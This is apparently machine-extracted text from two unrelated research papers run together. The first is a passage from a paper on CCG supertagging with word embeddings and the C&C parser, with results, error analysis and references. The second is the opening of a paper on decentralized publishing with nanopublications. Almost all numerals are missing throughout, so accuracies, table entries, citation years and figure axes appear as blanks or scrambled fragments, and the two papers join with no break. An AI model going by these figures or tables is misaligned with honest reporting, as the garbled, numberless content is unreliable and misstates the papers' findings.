generally outperformed using a window of words (we also experimented with a word window, but found performance decreased slightly to . % for the turian- embeddings). there is no clear trend on the optimal dimension of the embedding space, and it is likely to vary with training methods and corpus size. next, we experimented with the size of the addi- tional hidden layer—for efficiency, using the turian- embeddings with a -word context window. re- sults are shown in table , and suggest that a hid- den layer is not useful for this task—possibly due to over-fitting. embeddings additional hidden layer size accuracy turian- . % turian- . % turian- . % turian- . % turian- . % table : comparison of different model architec- tures, using the turian embeddings and a -word context window. a size of means no additional hidden layer was used. in all subsequent experiments we used a context window of words, no additional hidden layer, and the turian- embeddings. . crf model we also experimented with the crf model for supertagging . training these models took far longer than our neural-network model, due to the need to use the forward-backward algorithm with a × -dimensional transition matrix during training (rather than considering each word’s cate- gory independently). consequently, we only exper- imented with the turian- embeddings with a - word context window, which attained the best per- formance using the neural network. we found that using the turian- embeddings gave a surprisingly weak performance of just . % (compared to . % for the neural network model). we hypothesised that one reason for this result could be that the model is unable to modify the embeddings during supervised training (in contrast to the neural-network model). consequently, we built a new set of embeddings, using the weight- matrix learned by our best neural network model. a new crf model was then trained using the tuned embeddings. performance then improved dramati- cally to . %, and slightly outperformed the neu- ral network—showing that while there is a small advantage to using sequence information, it is cru- cial to allow supervised training to modify the em- beddings. these results help explain why collobert et al. ( b)’s neural network models outperform turian et al. ( )’s sequence models—but greater implemented using crfsuite (okazaki, ) improvements may be possible with the combined approach we introduce here, which allows the model to both tune the embeddings and exploit sequence information. however, tagging with this model was considerably slower than the neural network (again, due to the cost of decoding), so we used the neural network architecture in the remaining experiments. . multitagging accuracy the c&c parser takes a set of supertags per word as input, which is used to prune the search space. if no parse is found, the sentence is supertagged again with a wider beam. the effectiveness of the pruning therefore depends on the accuracy of the supertagger at a given level of ambiguity. we experimented with the accuracy of different supertaggers at different levels of ambiguity. for the c&c supertagger, we vary the number of categories per word using the same back-off beam settings re- ported in clark and curran ( ). for our supertag- ger, we vary recall by adjusting the a variable-width beam, which removes tags whose probability is less than β times that of the most likely tag. results are shown in figure . the supertag- gers based on embeddings consistently match or out- perform the c&c supertagger at all levels of recall across all domains. while performance is similar with a small number of tags per word, our supertag- gers perform better with a more relaxed beam— perhaps representing cases which are challenging for the c&c model, such as pos-tag errors. . parsing accuracy we investigate whether our supertagger improves the performance of the c&c parser, by replacing the standard c&c supertagger with our model. this evaluation is somewhat indirect, as the parser does not make use of the supertagger probabilities for cat- egories, but instead simply uses it to prune the search space. however, we show that better pruning leads directly to better parsing accuracies. c&c parser results on ccgbank and wikipedia are reported using clark and curran ( )’s best performing hybrid model (trained on sections - ), with automatic pos-tags, and the parameters this model is not publicly available, so we re-trained it follow- ing the instructions at http://aclweb.org/aclwiki/ index.php?title=training_the_c&c_parser ccgbank section average categories per word o ra cl e c at eg or y a cc ur ac y (% ) c&c turian- wikipedia average categories per word o ra cl e c at eg or y a cc ur ac y (% ) c&c turian- biomedical average categories per word o ra cl e c at eg or y a cc ur ac y (% ) c&c turian- figure : ambiguity vs. accuracy for different su- pertaggers across different domains. datapoints for the c&c parser use its standard back-off parameters. supertagger ccgbank wikipedia bioinfer f cov f f cov f f cov f (cov) (all) (cov) (all) (cov) (all) c&c . . . . . . . . . honnibal et al. ( ) . . - . . - - - - brown clusters . . . . . . . . . turian- embeddings . . . . . . . . . turian- + pos tags . . . . . . . . . turian- + frequent words . . . . . . . . . table : parsing f -scores for labelled dependencies across a range of domains, using the c&c parser with different supertaggers. embeddings models used a context window of words, and no additional hidden layer. following previous ccg parsing work, we report f -scores on the subset of sentences where the parser is able to produce a parse (f -cov), and the parser’s coverage (cov). where available we also report overall scores (f -all), including parser failures, which we believe gives a more realistic assessment. used in the published results. biomedical results use the publicly available parsing model, setting the ‘parser beam ratio’ parameter to − , which im- proved results on development data. to achieve full coverage on the wikipedia corpus, we increased the ‘max supercats’ parameter to . c&c accuracies differ very slightly from previously reported results, due to differences in the retrained models. as in clark and curran ( ), we use a variable- width beam β that prunes categories whose prob- ability is less than β times that of the most likely category. for simplicity, our supertaggers use the same β back-off parameters as are used by the c&c parser, though it is possible that further improve- ments could be gained by carefully tuning these pa- rameters. in contrast to the c&c supertaggers, we do not make use a tag-dictionaries. results are shown in table , and our supertag- gers consistently lead to improvements over the baseline parser across all domains, with larger im- provements out-of-domain. our best model also outperforms honnibal et al. ( )’s self-training approach to domain adaptation on wikipedia (which lowers performance on ccgbank). our results show that word embeddings are an ef- fective way of adding distributional information into ccg supertagging. a popular alternative approach we briefly experimented setting the β parameters to match the ambiguity of the c&c supertagger on section of ccgbank, which caused the f -score using the turian- embeddings to drop slightly from . to . . for semi-supervised learning is to use brown clus- ters (brown et al., ). to ensure a fair com- parison with the turian embeddings, we use clus- ters trained on the same corpus, and use a com- parable feature set (clusters, capitalization, and - character suffixes—all implemented as sparse bi- nary features). brown clusters are hierarchical, and following koo et al. ( ), we incorporate brown clusters features at multiple levels of granularity— using coarse clusters (loosely analogous to pos- tags) and fine-grained clusters. results show slightly lower performance than c&c in domain, but higher performance out of domain. however, they are substantially lower than results using the turian- embeddings. we also experimented with adding traditional word and pos features, which were implemented as sparse vectors for each word in the context win- dow. we found that including pos features (de- rived from the c&c pos-tagger) reduced accuracy across all domains. one reason is that pos tags are highly discriminative features, therefore errors can be hard to recover from. adding lexical features for the most frequent words had little impact on re- sults, showing that the embeddings already represent this information. for infrequent words, the c&c parser uses a hard constraint that only certain pos-tag/supertag com- binations are allowed. this constraint means that the parser may be particularly vulnerable to pos- words with incorrect pos tag ( %) average categories per word o ra cl e c at eg or y a cc ur ac y (% ) c&c turian- figure : ambiguity vs. accuracy for different su- pertaggers, on words with incorrect pos tags. tag errors, as the model cannot override the hard- constraint. we therefore also ran the model allowing any pos-tag/supertag combination. we found that parsing accuracy was . higher on development data (and much slower), suggesting that the model itself is overly reliant on pos-features. . error analysis we have demonstrated that word embeddings are highly effective for ccg supertagging. in this sec- tion, we investigate several cases in which they are particularly helpful—by measuring supertagger performance when the pos tagger made mistakes, when words were unseen in the labelled data, and when the labelled data only contains the word with a different category. our supertaggers show substan- tial improvements over more complex existing mod- els. figure shows performance when the pos- tagger assigns the wrong tag to a word. both sys- tems show dramatically lower performance on these cases—the embeddings supertagger does not use pos features, but pos errors are likely to represent generally difficult examples. however, the embed- dings supertagger is almost % more accurate on this subset than the c&c supertagger, and with a re- laxed beam reaches % accuracy, showing the ad- vantages of avoiding a pipeline approach. in con- trast, the c&c tagger is not robust to pos tag- words only seen with other categories ( %) average categories per word o ra cl e c at eg or y a cc ur ac y (% ) c&c turian- figure : ambiguity vs. accuracy for different su- pertaggers, on words that do occur in the training data, but not with the category required in the test data. ger errors, and asymptotes at just % accuracy. an alternative way of mitigating pos errors is to use a distribution over pos tags as features in the supertagger—curran et al. ( ) show that this technique improves supertagging accuracy by . % over the c&c baseline, but do not report the impact on parsing. figure shows performance when the a word has been seen in the training data, but only with a dif- ferent category from the instance in the test data (for example, european only occurs as a adjective in the training data, but it may occur as a noun in the test data). performance is even worse on these cases, which appear to be extremely difficult for existing models. the accuracy of the embeddings supertag- ger converges at just %, suggesting that our model has overfit the labelled data. however, it still out- performs the c&c supertagger by % with a beam allowing tags per word. the large jump in c&c supertagger performance for the final back-off level is due to a change in the word frequency threshold at which the c&c parser only considers word/category pairs that occur in the labelled data. figure gives results for cases where the word is unseen in the labelled data. the c&c supertag- ger performance is surprisingly good on such cases, suggesting that the morphological and context used unseen words ( %) average categories per word o ra cl e c at eg or y a cc ur ac y (% ) c&c turian- figure : ambiguity vs. accuracy for different supertaggers, on words which are unseen in the la- belled data. is normally sufficient for inferring categories for un- seen words. however, our supertagger still clearly outperforms the c&c supertagger, suggesting that the large vocabulary of the unsupervised embed- dings helps it to generalize from the labelled data. we also investigated supertagging accuracy on different types of word—table shows several in- teresting cases. while performance on nouns is sim- ilar, our supertagger is substantially better on verbs. verbs can have many different ccg categories, de- pending on the number of arguments and tense, and not all valid word/category combinations will be seen in the labelled data. our embeddings allow the supertagger to learn generalizations, such as that transitive verbs can also often have intransitive uses. similarly, wh-words can have many possible cate- gories in complex constructions like relative clauses and pied-piping—and our embeddings may help the model generalize from having seen a category for which to one for whom. on the other hand, the c&c supertagger performs much better on prepositions. prepositions have different categories when appear- ing as arguments or adjuncts, and the distinction in the gold-standard was made using somewhat arbi- trary heuristics (hockenmaier and steedman, ). it seems our embeddings have failed to capture these subtleties. future work should explore methods for combining the strengths of each model. word type c&c accuracy turian- embeddings accuracy verbs . % . % nouns . % . % wh-words . % . % prepositions . % . % table : supertagging accuracy on different types of words, with an ambiguity of . tags per word (corresponding to the c&c’s initial beam setting). overall performance with this beam is almost iden- tical. words types were identified using gold pos tags, using in for prepositions. . discussion with a narrow supertagger beam, our method gives similar results to the c&c supertagger. however, it gains by being more accurate on difficult cases, due to not relying on lexical or pos features. these improvements lead directly to parser improvements. we identify two cases where our supertagger greatly outperforms the c&c parser: where the pos-tag is incorrect, and where the word-category pair is un- seen in the labelled data. our approach achieves larger improvements out-of-domain than in-domain, suggesting that the large vocabulary of embeddings built by the unsupervised pre-training allows it to better generalize from the labelled data. interestingly, the best-performing turian- em- beddings were trained on just m words of text (compared to b words for the skip-gram embed- dings), suggesting that further improvements may well be possible using larger unlabelled corpora. fu- ture work should investigate whether the models and embeddings that work well for supertagging gener- alize to other tasks. related work many methods have recently been proposed for im- proving supervised parsers with unlabelled data. most of these are orthogonal to our work, and larger improvements may be possible by combining them. thomforde and steedman ( ) extends a ccg lexicon by inferring categories for unseen words, based on the likely categories of surrounding words. unlike our method, this approach is able to learn categories which were unseen in the labelled data, which is shown to be useful for parsing a corpus of questions. deoskar et al. ( ) and deoskar et al. ( ) use viterbi-em to learn new lexical en- tries by running a generative parser over a large un- labelled corpus. they show good improvements in accuracy on unseen words, but not overall parsing improvements in-domain. their parsing model aims to capture non-local information about word usage, which would not be possible for the local context windows used to learn our embeddings. self-training is another popular method for do- main adaptation, and was used successfully by hon- nibal et al. ( ) to improve ccg parser perfor- mance on wikipedia. however, it caused a decrease in performance on the in-domain data, and our method achieves better performance across all do- mains. mcclosky et al. ( ) improve a penn tree- bank parser in-domain using self-training, but other work has failed to improve performance out-of- domain using self training (dredze et al., ). in a similar spirit to our work, koo et al. ( ) improve parsing accuracy using unsupervised word clus- ter features—we have shown that word-embeddings outperform brown clusters for ccg supertagging. an alternative approach to domain adaptation is to annotate a small corpus of out-of-domain text. rimell and clark ( ) argue that this annotation is simpler for lexicalized formalisms such as ccg, as large improvements can be gained from annotat- ing lexical categories, rather than full syntax trees. they achieve higher parsing accuracies than us on biomedical text, but our unsupervised method re- quires no annotation. it seems likely that our method could be further improved by incorporating out-of- domain labelled data (where available). the best reported ccg parsing results have been achieved with a model that integrates supertagging and parsing (auli and lopez, a; auli and lopez, b). this work still uses the same fea- ture set as the c&c parser, suggesting further im- provements may be possible by using our embed- dings features. auli and lopez pos-tag the sentence before parsing, but using our features would allow us to fully eliminate the current pipeline approach to ccg parsing. our work also builds on approaches to semi- supervised nlp using neural embeddings (turian et al., ; collobert et al., b). existing work has mainly focused on ‘flat’ tagging problems, with- out hierarchical structure. collobert ( ) gives a model for parsing using embeddings features, by treating each level of the parse tree as a sequence classification problem. socher et al. ( ) in- troduce a model in which context-free grammar parses are reranked based on compositional distri- butional representations for each node. andreas and klein ( ) experiment with a number of ap- proaches to improving the berkeley parser with word embeddings. such work has not improved over state-of-the-art existing feature sets for constituency parsing—although bansal et al. ( ) achieve good results for dependency parsing using embeddings. ccg categories contain much of the hierarchical structure needed for parsing, giving a simpler way to improve a parser using embeddings. conclusions we have shown that ccg parsing can be signif- icantly improved by predicting lexical categories based on unsupervised word embeddings. the re- sulting parsing pipeline is simpler, and has improved performance both in and out of domain. we ex- pect further improvements to follow as better word embeddings are developed, without other changes to our model. our approach reduces the problem of sparsity caused by the large number of ccg categories, suggesting that finer-grained categories could be created for ccgbank (in the spirit of hon- nibal et al. ( )), which lead to improved perfor- mance in downstream semantic parsers. future work should also explore domain-adaptation, either using unsupervised embeddings trained on out-of-domain text, or using supervised training on out-of-domain corpora. our results also have implications for other nlp tasks—suggesting that using word embeddings features may be particularly useful out-of-domain, in pipelines that currently rely on pos taggers, and in tasks which suffer from sparsity in the labelled data. code for our supertagger is released as part of the easyccg parser (lewis and steedman, ), available from: https://github.com/ mikelewis /easyccg acknowledgments we would like to thank tejaswini deoskar, bharat ram ambati, michael roth and the anonymous reviewers for helpful feedback on an earlier ver- sion of this paper. we also thank rahul jha for sharing his re-implementation of collobert et al. ( b)’s model, and stephen clark, laura rimell and matthew honnibal for making their out-of- domain ccg corpora available. references jacob andreas and dan klein. . how much do word embeddings encode about syntax. in proceedings of acl. michael auli and adam lopez. a. a comparison of loopy belief propagation and dual decomposition for integrated ccg supertagging and parsing. in pro- ceedings of the th annual meeting of the associa- tion for computational linguistics: human language technologies-volume , pages – . association for computational linguistics. michael auli and adam lopez. b. training a log- linear parser with loss functions via softmax-margin. in proceedings of the conference on empirical meth- ods in natural language processing, pages – . association for computational linguistics. srinivas bangalore and aravind k joshi. . su- pertagging: an approach to almost parsing. compu- tational linguistics, ( ): – . mohit bansal, kevin gimpel, and karen livescu. . tailoring continuous word representations for depen- dency parsing. in proceedings of the annual meeting of the association for computational linguistics. johan bos. . wide-coverage semantic analysis with boxer. in johan bos and rodolfo delmonte, editors, semantics in text processing. step conference proceedings, research in computational semantics, pages – . college publications. p.f. brown, p.v. desouza, r.l. mercer, v.j.d. pietra, and j.c. lai. . class-based n-gram models of natural language. computational linguistics, ( ): – . stephen clark and james r curran. . wide- coverage efficient statistical parsing with ccg and log-linear models. computational linguistics, ( ): – . michael collins. . discriminative training meth- ods for hidden markov models: theory and experi- ments with perceptron algorithms. in proceedings of the acl- conference on empirical methods in natu- ral language processing-volume , pages – . asso- ciation for computational linguistics. ronan collobert, koray kavukcuoglu, and clément farabet. a. torch : a matlab-like environment for machine learning. in biglearn, nips workshop. ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel kuksa. b. natural language processing (almost) from scratch. the journal of machine learning research, : – . ronan collobert. . deep learning for effi- cient discriminative parsing. in geoffrey j. gordon, david b. dunson, and miroslav dudk, editors, ais- tats, volume of jmlr proceedings, pages – . jmlr.org. james r curran, stephen clark, and david vadas. . multi-tagging for lexicalized-grammar parsing. in proceedings of the st international conference on computational linguistics and the th annual meet- ing of the association for computational linguistics, pages – . association for computational lin- guistics. tejaswini deoskar, markos mylonakis, and khalil sima’an. . learning structural dependencies of words in the zipfian tail. in proceedings of the th international conference on parsing technolo- gies, pages – . association for computational lin- guistics. tejaswini deoskar, christos christodoulopoulos, alexandra birch, and mark steedman. . gener- alizing a strongly lexicalized parser using unlabeled data. in proceedings of the th conference of the european chapter of the association for compu- tational linguistics. association for computational linguistics. mark dredze, john blitzer, partha pratim talukdar, kuz- man ganchev, joao graca, and fernando pereira. . frustratingly hard domain adaptation for depen- dency parsing. in emnlp-conll, pages – . julia hockenmaier and mark steedman. . ccg- bank: a corpus of ccg derivations and dependency structures extracted from the penn treebank. compu- tational linguistics, ( ): – . matthew honnibal, joel nothman, and james r cur- ran. . evaluating a statistical ccg parser on wikipedia. in proceedings of the workshop on the people’s web meets nlp: collaboratively con- structed semantic resources, pages – . associa- tion for computational linguistics. m. honnibal, j.r. curran, and j. bos. . rebanking ccgbank for improved np interpretation. in proceed- ings of the th annual meeting of the association for computational linguistics, pages – . associa- tion for computational linguistics. terry koo, xavier carreras, and michael collins. . simple semi-supervised dependency parsing. jayant krishnamurthy and tom m. mitchell. . weakly supervised training of semantic parsers. in proceedings of the joint conference on empir- ical methods in natural language processing and computational natural language learning, emnlp- conll ’ , pages – . association for compu- tational linguistics. tom kwiatkowski, luke zettlemoyer, sharon goldwa- ter, and mark steedman. . inducing probabilistic ccg grammars from logical form with higher-order unification. in proceedings of the conference on empirical methods in natural language processing, emnlp ’ , pages – . association for com- putational linguistics. tom kwiatkowski, eunsol choi, yoav artzi, and luke zettlemoyer. . scaling semantic parsers with on- the-fly ontology matching. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – , seattle, wash- ington, usa, october. association for computational linguistics. mike lewis and mark steedman. a. combined distributional and logical semantics. transactions of the association for computational linguistics, : – . mike lewis and mark steedman. b. unsupervised induction of cross-lingual semantic relations. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – , seattle, washington, usa, october. association for computational linguistics. mike lewis and mark steedman. . a* ccg pars- ing with a supertag-factored model. in proceedings of the conference on empirical methods in natural language processing (emnlp), doha, qatar, octo- ber. mitchell p marcus, mary ann marcinkiewicz, and beat- rice santorini. . building a large annotated cor- pus of english: the penn treebank. computational linguistics, ( ): – . david mcclosky, eugene charniak, and mark johnson. . effective self-training for parsing. in proceed- ings of the main conference on human language tech- nology conference of the north american chapter of the association of computational linguistics, pages – . association for computational linguistics. tomas mikolov, kai chen, greg corrado, and jeffrey dean. . efficient estimation of word representa- tions in vector space. arxiv preprint arxiv: . . tomáš mikolov. . statistical language models based on neural networks. ph.d. thesis, ph. d. the- sis, brno university of technology. andriy mnih and geoffrey e hinton. . a scal- able hierarchical distributed language model. in nips, pages – . joakim nivre, laura rimell, ryan mcdonald, and carlos gómez rodrı́guez. . evaluation of dependency parsers on unbounded dependencies. in proceedings of the rd international conference on computa- tional linguistics (coling ), pages – , bei- jing, china, august. coling organizing commit- tee. naoaki okazaki. crfsuite: a fast implementation of conditional random fields (crfs). sampo pyysalo, filip ginter, juho heimonen, jari björne, jorma boberg, jouni järvinen, and tapio salakoski. . bioinfer: a corpus for information extraction in the biomedical domain. bmc bioinfor- matics, ( ): . laura rimell and stephen clark. . adapting a lexicalized-grammar parser to contrasting domains. in proceedings of the conference on empirical methods in natural language processing, pages – . as- sociation for computational linguistics. laura rimell and stephen clark. . porting a lexicalized-grammar parser to the biomedical domain. journal of biomedical informatics, ( ): – . laura rimell, stephen clark, and mark steedman. . unbounded dependency recovery for parser evalua- tion. in proceedings of the conference on empirical methods in natural language processing: volume -volume , pages – . association for computational linguistics. richard socher, john bauer, christopher d manning, and andrew y ng. . parsing with compositional vec- tor grammars. in in proceedings of the acl confer- ence. citeseer. emily thomforde and mark steedman. . semi- supervised ccg lexicon extension. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – . association for computational linguistics. joseph turian, lev ratinov, and yoshua bengio. . word representations: a simple and general method for semi-supervised learning. in proceedings of the th annual meeting of the association for computational linguistics, pages – . association for computa- tional linguistics. submitted february accepted july published august corresponding author tobias kuhn, kuhntobias@gmail.com academic editor luc moreau additional information and declarations can be found on page doi . /peerj-cs. copyright kuhn et al. distributed under creative commons cc-by . open access decentralized provenance-aware publishing with nanopublications tobias kuhn , christine chichester , michael krauthammer , , núria queralt-rosinach , ruben verborgh , george giannakopoulos , , axel-cyrille ngonga ngomo , raffaele viglianti and michel dumontier department of computer science, vu university amsterdam, amsterdam, netherlands nestle institute of health sciences, lausanne, switzerland yale university school of medicine, yale university, new haven, ct, united states yale program in computational biology and bioinformatics, yale university, new haven, ct, united states research programme on biomedical informatics, hospital del mar medical research institute, universitat pompeu fabra, barcelona, spain data science lab, ghent university, ghent, belgium institute of informatics and telecommunications, ncsr demokritos, athens, greece scify private not-for-profit company, athens, greece aksw research group, university of leipzig, leipzig, germany maryland institute for technology in the humanities, university of maryland, college park, md, united states stanford center for biomedical informatics research, stanford university, stanford, ca, united states abstract publication and archival of scientific results is still commonly considered the respons- ability of classical publishing companies. classical forms of publishing, however, which center around printed narrative articles, no longer seem well-suited in the digital age. in particular, there exist currently no efficient, reliable, and agreed-upon methods for publishing scientific datasets, which have become increasingly important for science. in this article, we propose to design scientific data publishing as a web-based bottom-up process, without top-down control of central authorities such as publishing companies. based on a novel combination of existing concepts and technologies, we present a server network to decentrally store and archive data in the form of nanopublications, an rdf-based format to represent scientific data. we show how this approach allows researchers to publish, retrieve, verify, and recombine datasets of nanopublications in a reliable and trustworthy manner, and we argue that this architecture could be used as a low-level data publication layer to serve the semantic web in general. our evaluation of the current network shows that this system is efficient and reliable. subjects bioinformatics, computer networks and communications, digital libraries, world wide web and web science keywords data publishing, nanopublications, provenance, linked data, semantic web introduction modern science increasingly depends on datasets, which are however left out in the classical way of publishing, i.e., through narrative (printed or online) articles in journals or conference proceedings. this means that the publications describing scientific findings become disconnected from the data they are based on, which can seriously impair the how to cite this article kuhn et al. ( ), decentralized provenance-aware publishing with nanopublications. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:kuhntobias@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. verifiability and reproducibility of their results. addressing this issue raises a number of practical problems: how should one publish scientific datasets and how can one refer to them in the respective scientific publications? how can we be sure that the data will remain available in the future and how can we be sure that data we find on the web have not been corrupted or tampered with? moreover, how can we refer to specific entries or subsets from large datasets, for instance, to support a specific argument or hypothesis? to address some of these problems, a number of scientific data repositories have appeared, such as figshare and dryad (http://figshare.com, http://datadryad.org). furthermore, digital object identifiers (doi) have been advocated to be used not only for articles but also for scientific data (paskin, ). while these approaches certainly improve the situation of scientific data, in particular when combined with semantic web techniques, they have nevertheless a number of drawbacks: they have centralized architectures, they give us no possibility to check whether the data have been (deliberately or accidentally) modified, and they do not support access or referencing on a more granular level than entire datasets (such as individual data entries). we argue that the centralized nature of existing data repositories is inconsistent with the decentralized manner in which science is typically performed, and that it has serious consequences with respect to reliability and trust. the organizations running these platforms might at some point go bankrupt, be acquired by investors who do not feel committed to the principles of science, or for other reasons become unable to keep their websites up and running. even though the open licenses enforced by these data repositories will probably ensure that the datasets remain available at different places, there exist no standardized (i.e., automatable) procedures to find these alternative locations and to decide whether they are trustworthy or not. even if we put aside these worst-case scenarios, websites have typically not a perfect uptime and might be down for a few minutes or even hours every once in a while. this is certainly acceptable for most use cases involving a human user accessing data from these websites, but it can quickly become a problem in the case of automated access embedded in a larger service. furthermore, it is possible that somebody gains access to the repository’s database and silently modifies part of the data, or that the data get corrupted during the transfer from the server to the client. we can therefore never perfectly trust any data we get, which significantly complicates the work of scientists and impedes the potential of fully automatic analyses. lastly, existing forms of data publishing have for the most part only one level at which data is addressed and accessed: the level of entire datasets (sometimes split into a small number of tables). it is in these cases not possible to refer to individual data entries or subsets in a way that is standardized and retains the relevant metadata and provenance information. to illustrate this problem, let us assume that we conduct an analysis using, say, , individual data entries from each of three very large datasets (containing, say, millions of data entries each). how can we now refer to exactly these , entries to justify whatever conclusion we draw from them? the best thing we can currently do is to republish these , data entries as a new dataset and to refer to the large datasets as their origin. apart from the practical disadvantages of being forced to republish data just to refer to subsets of larger datasets, other scientists need to either (blindly) trust us or go through the tedious process of semi-automatically verifying that each of these entries kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://figshare.com http://datadryad.org http://dx.doi.org/ . /peerj-cs. indeed appears in one of the large datasets. instead of republishing the data, we could also try to describe the used subsets, e.g., in the form of sparql queries in the case of rdf data, but this doesn’t make it less tedious, keeping in mind that older versions of datasets are typically not provided by public apis such as sparql endpoints. below, we present an approach to tackle these problems, which builds upon existing semantic web technologies, in particular rdf and nanopublications, adheres to accepted web principles, such as decentralization and rest apis, and supports the fair guiding principles of making scientific data findable, accessible, interoperable, and reusable (wilkinson et al., ). specifically, our research question is: can we create a decentralized, reliable, and trustworthy system for publishing, retrieving, and archiving linked data in the form of sets of nanopublications based on existing web standards and infrastructure? it is important to note here that the word trustworthy has a broad meaning and there are different kinds of trust involved when it comes to retrieving and using datasets from some third party. when exploring existing datasets, a certain kind of trust is needed to decide whether an encountered dataset is appropriate for the given purpose. a different kind of trust is needed to decide whether an obtained file correctly represents a specific version of a specific dataset that has been chosen to be used. only the second kind of trust can be achieved with a technical solution alone, and we use the word trustworthy in this paper in this narrow technical sense covering the second kind of trust. this article is an extended and revised version of a previous conference paper (kuhn et al., ). these extensions include, most importantly, a new evaluation on the retrieval of nanopublication datasets over an unreliable connection, a description of the new feature of surface patterns, the specific protocol applied by existing servers, a server network that is now three times as large as before ( instead of five server instances), a much more detailed walk-through example, and five new figures. we furthermore present more details and discussions on topics including applications in the humanities, traversal-based querying, underspecified assertions, caching between architectural layers, and access of the server network via a web interface. background nanopublications (groth, gibson & velterop, ) are a relatively recent proposal for improving the efficiency of finding, connecting, and curating scientific findings in a manner that takes attribution, quality levels, and provenance into account. while narrative articles would still have their place in the academic landscape, small formal data snippets in the form of nanopublications should take their central position in scholarly communication (mons et al., ). most importantly, nanopublications can be automatically interpreted and aggregated and they allow for fine-grained citation metrics on the level of individual claims. a nanopublication is defined as a small data container consisting of three parts: an assertion part containing the main content in the form of an atomic piece of formally represented data (e.g., an observed effect of a drug on a disease); a provenance part that describes how this piece of data came about (e.g., how it was measured); and a publication info part that gives meta-information about the nanopublication as a whole kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (e.g., when it was created). the representation of a nanopublication with its three parts is based on the rdf language with named graphs (carroll et al., ). in other words, the nanopublication approach boils down to the ideas of subdividing scientific results into atomic assertions, representing these assertions in rdf, attaching provenance information in rdf on the level of individual assertions, and treating each of these tiny entities as an individual publication. nanopublications have been applied to a number of domains, so far mostly from the life sciences including pharmacology (williams et al., ; banda et al., ), genomics (patrinos et al., ), and proteomics (chichester et al., ). an increasing number of datasets formatted as nanopublications are openly available, including nextprot (chichester et al., ) and disgenet (queralt-rosinach et al., ), and the nanopublication concept has been combined with and integrated into existing frameworks for data discovery and integration, such as ckan (mccusker et al., ). interestingly, the concept of nanopublications has also been taken up in the humanities, namely in philosophy (http://emto-nanopub.referata.com/wiki/emto_nanopub), musi- cology (freedman, ), and history/archaeology (golden & shaw, ). a humanities dataset of facts is arguably more interpretive than a scientific dataset; relying, as it does, on the scholarly interpretation of primary sources. because of this condition, ‘‘facts’’ in human- ities datasets (such as prosopographies) have often been called ‘‘factoids’’ (bradley, ), as they have to account for a degree of uncertainty. nanopublications, with their support for granular context and provenance descriptions, offer a novel paradigm for publishing such factoids, by providing methods for representing metadata about responsibilities and by enabling discussions and revisions beyond any single humanities project. research objects are an approach related to nanopublications, aiming to establish ‘‘self-contained units of knowledge’’ (belhajjame et al., ), and they constitute in a sense the antipode approach to nanopublications. we could call them mega-publications, as they contain much more than a typical narrative publication, namely resources like input and output data, workflow definitions, log files, and presentation slides. we demonstrate in this paper, however, that bundling all resources of scientific studies in large packages is not a necessity to ensure the availability of the involved resources and their robust interlinking, but we can achieve that also with cryptographic identifiers and a decentralized architecture. sparql is an important and popular technology to access and publish linked data, and it is both a language to query rdf datasets (harris & seaborne, ) and a protocol to execute such queries on a remote server over http (feigenbaum et al., ). servers that provide the sparql protocol, referred to as ‘‘sparql endpoints,’’ are a technique for making linked data available on the web in a flexible manner. while off-the-shelf triple stores can nowadays handle billions of triples or more, they potentially require a significant amount of resources in the form of memory and processor time to execute queries, at least if the full expressive power of the sparql language is supported. a recent study found that more than half of the publicly accessible sparql endpoints are available less than % of the time (buil-aranda et al., ), posing a major problem to services depending on them, in particular to those that depend on several endpoints at the same time. to understand the consequences, imagine one has to program a mildly time-critical service that depends on rdf data from, say, ten different sparql endpoints. assuming that each kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://emto-nanopub.referata.com/wiki/emto_nanopub http://dx.doi.org/ . /peerj-cs. endpoint is available % of the time and their availabilities are independent from each other, this means at least one of them will be down during close to five months per year. the reasons for this problem are quite clear: sparql endpoints provide a very powerful query interface that causes heavy load in terms of memory and computing power on the side of the server. clients can request answers to very specific and complex queries they can freely define, all without paying a cent for the service. this contrasts with almost all other http interfaces, in which the server imposes (in comparison to sparql) a highly limited interface, where the computational costs per request are minimal. to solve these and other problems, more light-weight interfaces were suggested, such as the read-write linked data platform interface (speicher, arwe & malhotra, ), the triple pattern fragments interface (verborgh et al., ), as well as infrastructures to implement them, such as cumulusrdf (ladwig & harth, ). these interfaces deliberately allow less expressive requests, such that the maximal cost of each individual request can be bounded more strongly. more complex queries then need to be evaluated by clients, which decompose them in simpler subqueries that the interface supports (verborgh et al., ). while this constitutes a scalability improvement (at the cost of, for instance, slower queries), it does not necessarily lead to perfect uptimes, as servers can be down for other reasons than excessive workload. we propose here to go one step further by relying on a decentralized network and by supporting only identifier-based lookup of nanopublications. such limited interfaces normally have the drawback that traversal-based querying does not allow for the efficient and complete evaluation of certain types of queries (hartig, ), but this is not a problem with the multi-layer architecture we propose below, because querying is only performed at a higher level where these limitations do not apply. a well-known solution to the problem of individual servers being unreliable is the application of a decentralized architecture where the data is replicated on multiple servers. a number of such approaches related to data sharing have been proposed; for example, in the form of distributed file systems based on cryptographic methods for data that are public (fu, kaashoek & mazières, ) or private (clarke et al., ). in contrast to the design principles of the semantic web, these approaches implement their own internet protocols and follow the hierarchical organization of file systems. other approaches build upon the existing bittorrent protocol and apply it to data publishing (markman & zavras, ; cohen & lo, ), and there is interesting work on repurposing the proof-of-work tasks of bitcoin for data preservation (miller et al., ). there exist furthermore a number of approaches to applying peer-to-peer networks for rdf data (filali et al., ), but they do not allow for the kind of permanent and provenance-aware publishing that we propose below. moreover, only for the centralized and closed-world setting of database systems, approaches exist that allow for robust and granular references to subsets of dynamic datasets (proell & rauber, ). the approach that we present below is based on previous work, in which we proposed trusty uris to make nanopublications and their entire reference trees verifiable and immutable by the use of cryptographic hash values (kuhn & dumontier, ; kuhn & dumontier, ). this is an example of such a trusty uri: http://example.org/r .ra abxdpz dcayxch l ei rubosil xdu rxbbbauo kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . 